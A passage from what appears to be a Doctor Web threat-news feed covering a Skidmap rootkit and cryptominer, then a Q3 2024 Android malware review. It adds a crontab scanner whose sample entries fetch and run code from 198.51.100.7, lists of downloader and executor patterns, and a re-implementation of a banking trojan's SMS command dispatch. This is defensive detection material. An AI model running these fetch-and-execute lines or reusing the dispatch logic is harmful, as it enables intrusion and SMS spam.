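files under /etc/cron.d.
"""
import re

# Five schedule fields followed by the command.  System crontabs carry an
# extra user field, which simply ends up at the start of the command here.
CRON_LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
DOWNLOADERS = ("curl", "wget", "python -c", "python3 -c", "base64 -d")
EXECUTORS = ("| sh", "|sh", "| bash", "|bash", "chmod +x", "chmod 777", "exec(")

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * (curl -fsSL http://198.51.100.7/x.sh || wget -qO- http://198.51.100.7/x.sh) | sh
@reboot /sbin/custom-init
*/10 * * * * python3 -c "import urllib.request as u;exec(u.urlopen('http://198.51.100.7/p').read())"
"""


def interval_minutes(minute_field):
    """Minutes between runs: 1 for `*`, N for `*/N`, None for fixed lists."""
    if minute_field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def suspicious_cron_entries(crontab_text):
    """Return (schedule, command, reasons) for entries that fetch remote
    content or execute something they fetched; a short interval is added
    to the reasons because droppers re-run to survive cleanup."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE_RE.match(line)
        if not m:
            continue  # @reboot-style shortcuts and malformed lines: handle separately
        fields, command = m.groups()[:5], m.group(6)
        downloads = any(d in command for d in DOWNLOADERS)
        executes = any(e in command for e in EXECUTORS)
        if not (downloads or executes):
            continue
        reasons = []
        if downloads:
            reasons.append("downloads remote content")
        if executes:
            reasons.append("executes fetched content")
        every = interval_minutes(fields[0])
        if every is not None and every in range(1, 16) and fields[1] == "*":
            reasons.append("runs every %d minute(s)" % every)
        hits.append((" ".join(fields), command, reasons))
    return hits


if __name__ == "__main__":
    for schedule, command, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(schedule, "|", command)
        for reason in reasons:
            print("   -", reason)
```

&lt;p&gt;On a machine where the rootkit is already loaded, remember that the crontab you read through the compromised kernel may itself be filtered; the scan is most trustworthy when run against a disk image or from a rescue system, and the same applies to the /etc/cron.d files.&lt;/p&gt;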

&lt;p&gt;Once installed, the rootkit intercepts a number of system calls, allowing it to generate fake information in response to diagnostic commands entered by an administrator. Intercepted functions include those that report average CPU usage, network activity on a number of ports, and lists of files in directories. The rootkit also checks all kernel modules when they are loaded and prevents those that can detect its presence from running. All this allows it to thoroughly hide all aspects of the miner's cryptocurrency mining activity: computation, sending hashes, and receiving jobs.&lt;/p&gt;

&lt;p&gt;The purpose of the four backdoors installed by the dropper as part of this attack is to collect SSH credentials from the compromised machine and send them to the attackers, and to set a master password that works for every account on the system. Note that the harvested passwords are merely obfuscated with a Caesar cipher (a shift of four positions) before being sent, which hides them from a casual look at the traffic but is trivial to reverse.&lt;/p&gt;

&lt;p&gt;To extend their control over a compromised system, the attackers install the &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.RCTL.2&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.RCTL.2&lt;/b&gt;&lt;/a&gt; remote access trojan. It allows commands to be sent to the infected machine and data to be exfiltrated over an encrypted connection that the trojan itself initiates outbound, so it works from behind NAT and firewalls that block inbound connections.&lt;/p&gt;

&lt;p&gt;The xmrig program is installed as the miner; it can mine a number of cryptocurrencies, the best known of which is Monero, which has gained popularity on the darknet because its transactions hide sender, recipient and amount. It should be said that detecting a rootkit-covered miner in a cluster of servers is no trivial task. If the diagnostic data are spoofed, the only in-host signs of a compromise are excessive power consumption and increased heat generation; signals collected outside the guest kernel, such as hypervisor-side CPU metrics or network flow records from the switch, are not affected by an in-kernel rootkit and are worth correlating. However, attackers can also tune the miner's settings to find an optimal balance between mining performance and preserving hardware performance, thus drawing less attention to a compromised system.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Artboard_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Artboard_en.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;The evolution of the Skidmap malware family can be seen in the increasing complexity of the attack chain: the launched programs call each other, disable security systems, interfere with a large number of system utilities and services, download rootkits, etc., which makes it much more difficult to respond to such incidents.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/skidmap" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.142&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.143&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.MulDrop.144&amp;lng=en"&gt;&lt;b&gt;Linux.MulDrop.144&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Linux.Rootkit.400&amp;lng=en"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14912&amp;lng=en</guid><title>Doctor Web’s Q3 2024 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=14912&amp;lng=en&amp;c=9</link><pubDate>Tue, 01 Oct 2024 03:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;October 1, 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojan apps, used by threat actors in various fraudulent schemes, were the malicious programs most frequently detected on protected devices in the third quarter of 2024. Adware trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family ranked second. The third most commonly detected threats were &lt;b&gt;Android.Siggen&lt;/b&gt; trojans—programs that have different malicious functionality and that are difficult to classify into any particular family.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;In August, Doctor Web’s experts discovered the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor, which had infected nearly 1.3 million Android TV boxes belonging to users in 197 countries. This malicious app places its components into the system storage area of infected devices and, when commanded by threat actors, can covertly download and install various programs.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/02_Android.Vo1d_map_en.png" alt="Countries with the highest number of infected devices detected" style="width:75%;"&gt;
  &lt;/a&gt;
&lt;/p&gt;

  &lt;p&gt;In addition, banking trojans targeting Indonesian users were found. One of these, &lt;b&gt;Android.SmsSpy.888.origin&lt;/b&gt;, is protected with a software packer and detected as &lt;b&gt;Android.Siggen.Susp.9415&lt;/b&gt;. It was distributed under the guise of the BRI bank customer support app BRImo Support.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_1_en.jpg" class="preview alignCenter"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_1_en.1.jpg" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  
  &lt;p&gt;When launched, the trojan loads the real bank website https://bri.co.id in WebView. At the same time, it uses a Telegram bot API to send technical information about the infected device into the Telegram chat created by the threat actors.&lt;/p&gt;
  &lt;p&gt;&lt;b&gt;Android.SmsSpy.888.origin&lt;/b&gt; intercepts incoming SMS and also sends them into this chat. When it receives messages like &lt;span class="string"&gt;55555, &amp;lt;number&amp;gt;, &amp;lt;text&amp;gt;&lt;/span&gt;, it interprets them as commands and sends corresponding messages containing the text &lt;span class="string"&gt;&amp;lt;text&amp;gt;&lt;/span&gt; to the number &lt;span class="string"&gt;&amp;lt;number&amp;gt;&lt;/span&gt;. This way, the malware can both send SMS spam and spread among users.&lt;/p&gt;
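  &lt;p&gt;The command format above, implemented as an added example that is neither the trojan's code nor from the article: a parser that accepts only well-formed 55555 commands, keeps everything else as ordinary intercepted SMS, and tolerates commas inside the text part. The number check and the 160-character limit are the example's assumptions; the inbox messages are constructed and the +1-555-01xx numbers are fictional.&lt;/p&gt;

```python
"""Added example (not from the Doctor Web article or the trojan): a parser
for the `55555, number, text` SMS command format and the dispatch rule the
article describes.  Sample messages are constructed and the +1-555-01xx
numbers are fictional; the number check and length limit are assumptions.
"""
import re

COMMAND_MAGIC = "55555"
NUMBER_RE = re.compile(r"^\+?\d{6,15}$")  # loose international-number check
MAX_SMS_CHARS = 160  # one GSM-7 message part


def parse_sms_command(body):
    """Return {"number": ..., "text": ...} for a well-formed command,
    otherwise None so the message is treated as an ordinary SMS."""
    parts = body.split(",", 2)  # the text part may itself contain commas
    if len(parts) != 3:
        return None
    magic, number, text = (p.strip() for p in parts)
    if magic != COMMAND_MAGIC or not NUMBER_RE.match(number):
        return None
    if len(text) not in range(1, MAX_SMS_CHARS + 1):
        return None
    return {"number": number, "text": text}


def dispatch_incoming(messages, send):
    """Apply the rule to (sender, body) pairs: commands go to
    send(number, text); everything else is collected as intercepted mail.
    Returns (commands_executed, forwarded_messages)."""
    executed, forwarded = [], []
    for sender, body in messages:
        cmd = parse_sms_command(body)
        if cmd is None:
            forwarded.append((sender, body))
        else:
            send(cmd["number"], cmd["text"])
            executed.append(cmd)
    return executed, forwarded


SAMPLE_INBOX = [  # constructed
    ("+15550100001", "Your OTP is 482913. Do not share it."),
    ("+15550100002", "55555, +15550100003, Update your app here, link follows"),
    ("+15550100004", "55555, not-a-number, hello"),
]

if __name__ == "__main__":
    sent = []
    executed, forwarded = dispatch_incoming(SAMPLE_INBOX, lambda n, t: sent.append((n, t)))
    print("commands executed:", executed)
    print("messages sent on:", sent)
    print("forwarded to attackers:", forwarded)
```

  &lt;p&gt;The same parser doubles as a detection rule on the carrier or MDM side: an inbound message that parses as a command is by definition addressed to the malware, and the number it carries is the next victim the device is about to message.&lt;/p&gt;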
  &lt;p&gt;Another trojan that attacked Indonesian users was &lt;b&gt;Android.SmsSpy.11629&lt;/b&gt;. This malicious program is an SMS spy that is distributed under the guise of all kinds of apps. The variant in question was targeting Bank Mandiri Taspen customers and was passed off by the attackers as an official banking app—Movin by Bank Mandiri Taspen. The trojan displays instructions to potential victims and asks them to accept a user agreement. When a user accepts it, the trojan requests the permissions needed to work with SMS.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_2_en.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_2_en.1.jpg" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_3_en.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_3_en.1.jpg" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_4_en.jpg" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_4_en.1.jpg" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;  

  &lt;p&gt;Next, the malicious program loads a real page of the bank’s website, https://mail.bankmantap.co.id/, in WebView:&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_5_en.jpg" class="preview alignCenter"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/mob_review_5_en.1.jpg" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;&lt;b&gt;Android.SmsSpy.11629&lt;/b&gt; intercepts all incoming SMS. Next, it uses the Telegram bot API to send these messages into the attackers’ Telegram chat. It adds the text &lt;span class="string"&gt;developed by : @AbyssalArmy&lt;/span&gt; to all of the messages.&lt;/p&gt;
  &lt;p&gt;At the same time, our malware analysts again discovered threats on Google Play. Among them were many new fake apps and several ad-displaying trojans.&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;PRINCIPAL TRENDS OF Q3 2024&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;The &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; backdoor infected over a million TV box sets&lt;/li&gt;
      &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious apps, which are used to commit fraud&lt;/li&gt;
      &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans &lt;/li&gt;
      &lt;li&gt;The emergence of new malware on Google Play&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;

  &lt;h2 class="alignCenter"&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/02_malware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/02_malware_q3_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A trojan app designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7815&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7813&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Trojans that display obnoxious ads. These are special software modules that developers incorporate into applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;This trojan is built into third-party WhatsApp messenger mods and camouflaged as Google library classes. While the host application is being used, &lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; connects to one of the C&amp;C servers. It receives two URLs from it. One of them is intended for Russian-speaking users, and the other is for everyone else. The trojan then displays a dialog box whose contents it has also received from a remote server. When a user clicks on the confirmation button, malware loads the corresponding link in their browser.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/03_unwanted_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/03_unwanted_q3_2024_en.1.png" alt="Статистика вредоносных программ в почтовом трафике"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, users can remotely manage these apps. They can block them, display custom dialogs, and track when other software is being installed or removed from a device, etc.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, use the camera to record video and take photos, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/04_riskware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/04_riskware_q3_2024_en.1.png" alt="Статистика вредоносных программ в почтовом трафике"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modifications and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.17.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the app into which it is integrated. APK files launched with the help of this platform can operate as if they were part of that app and can also obtain the same permissions.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.2&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change how they operate or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to the common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
  &lt;/dl&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/05_adware_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/05_adware_q3_2024_en.1.png" alt="Статистика вредоносных программ в почтовом трафике"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.ModAd.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger into whose functions specific code has been injected. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) while the messenger is in operation. Such web addresses redirect to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;An adware module that malicious actors embed into the cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;  
  &lt;/dl&gt;

&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
  &lt;h2 class="alignCenter"&gt;Threats on Google Play&lt;/h2&gt;

  &lt;p&gt;In Q3 2024, Doctor Web’s malware analysts continued uncovering threats on Google Play. Among these were many new &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs that were distributed under the guise of a variety of software. Malicious actors passed some of them off as finance-related programs, such as investing apps, financial reference books and teaching aids, different home bookkeeping tools, and so on. Quite a few of these did actually provide the stated functionality, but their primary task was to load fraudulent websites. Such sites promise potential victims quick and easy money through investments, trading natural resources, cryptocurrency, etc. To supposedly join the “service”, users are asked to register an account or to provide personal data by filling out an “application”.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/06_Android.FakeApp.1643_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/06_Android.FakeApp.1643_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/07_Android.FakeApp.1644_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/07_Android.FakeApp.1644_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;It is noteworthy that fraudsters disguised one of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans as an online dating and chat app. However, it also loaded a bogus “investing” site.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/08_Android.FakeApp.1624_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/08_Android.FakeApp.1624_q3_2024.1.png" alt="Статистика вредоносных программ в почтовом трафике"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;Other &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans were again distributed as games. Under certain conditions, they loaded online casino and bookmaker sites.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/09_Android.FakeApp.1663_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/09_Android.FakeApp.1663_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/10_Android.FakeApp.1649_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/10_Android.FakeApp.1649_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;

  &lt;p&gt;Among these fake apps, our experts also detected new trojan variants that masquerade as job-search tools. Such malware loads fake job listings and suggests that users contact the corresponding employer via a messenger (this “employer” is, in fact, a fraudster) or create a “resume” by providing personal data.&lt;/p&gt;

  &lt;div class="margTM margBM column_grid_review column_grid_review--h"&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/11_Android.FakeApp.1627_q3_2024.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/11_Android.FakeApp.1627_q3_2024.1.png" alt="spinok_ads_2023"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_mobile/12_Android.FakeApp.1661_q3_2024.png" class="preview"&gt;
